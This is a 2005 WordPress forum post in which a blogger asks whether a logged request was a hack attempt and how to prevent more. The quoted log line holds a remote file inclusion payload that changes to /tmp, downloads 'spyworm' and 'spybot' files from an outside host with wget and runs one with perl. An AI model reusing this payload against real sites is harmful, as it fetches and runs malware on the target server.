My site was down from about noon yesterday (CDT) until just now when I upgraded to WP 1.2.2.
My webhost found this entry in my server logs and shut the site down:
babygotblog.com - 220.127.116.11 - - [02/Jan/2005:12:06:57 -0500] "GET /index.php?p=http://www.5wk.com/spy.gif?&cmd=cd%20/tmp;wget%20http://www.5wk.com/spyworm1;perl%2
0spyworm1;wget%20http://www.5wk.com/spybot HTTP/1.1" 403 - "-" "LWP::Simple/5.76"
With the comment,
That is not dealing with the Comment SPAM issue, that is an attempt to hack into your account. You need to make sure that you are running the latest version of the software and that all known security holes are patched. If you come into chat when you are ready to fix your site we can unsuspend your site.
All’s well that ends well, I suppose, but what troubles me is that I had something gobble up 5GB of bandwidth a couple of weekends ago and posted my solution on my blog, part of which was to disallow, via the .htaccess file, the user agent LWP::Simple. Yet, it appears this was part and parcel of the hack/script/string cited above. Does this mean that .htaccess “trick” is not working? (Bandwidth usage has settled back down to normal again, at least.)
Any thoughts as to anything further I might do to forestall such an occurrence in the future other than to always run the latest stable WP?
- The topic ‘Was this a hack attempt? Did my web host over-react?’ is closed to new replies.